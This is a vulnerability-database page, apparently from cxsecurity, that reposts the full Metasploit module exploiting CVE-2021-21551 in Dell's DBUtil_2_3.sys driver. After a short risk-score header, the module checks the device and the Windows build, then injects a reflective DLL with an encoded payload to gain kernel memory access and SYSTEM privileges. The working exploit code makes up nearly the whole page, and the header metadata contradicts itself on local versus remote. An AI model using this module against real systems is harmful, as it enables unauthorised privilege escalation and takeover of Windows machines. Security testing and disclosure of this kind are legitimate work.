Dell DBUtil_2_3.sys IOCTL Memory Read / Write

2021.05.17
Risk: High
Local: No
Remote: Yes
CWE: CWE-863


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, { 'Name' => 'Dell DBUtil_2_3.sys IOCTL memmove', 'Description' => %q{ The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by an attacker read and write kernel-mode memory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kasif Dekel', # (from SentinelLabs) blog with detailed analysis 'SentinelLabs', # vulnerability discovery and detailed analysis 'Spencer McIntyre' # metasploit module ], 'Arch' => [ ARCH_X64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'Payload' => { 'DisableNops' => true }, 'References' => [ [ 'CVE', '2021-21551' ], [ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ], [ 'URL', 'https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability' ], ], 'DisclosureDate' => '2021-05-04', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_OS_RESTARTS, ], 'Reliability' => [ REPEATABLE_SESSION, ] } } ) ) end def check sysinfo_value = sysinfo['OS'] if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return Exploit::CheckCode::Safe end handle = open_device('\\\\.\\dbutil_2_3', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) CheckCode::Appears end def target_compatible? sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i vprint_status("Windows Build Number = #{build_num}") return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601)) return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600) return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042) return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042) false end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end # check that the target is a compatible version of Windows (since the offsets are hardcoded) before loading the RDLL unless target_compatible? fail_with(Failure::NoTarget, 'The exploit does not support this target') end if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end encoded_payload = payload.encoded execute_dll( ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-21551', 'CVE-2021-21551.x64.dll'), [encoded_payload.length].pack('I<') + encoded_payload ) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top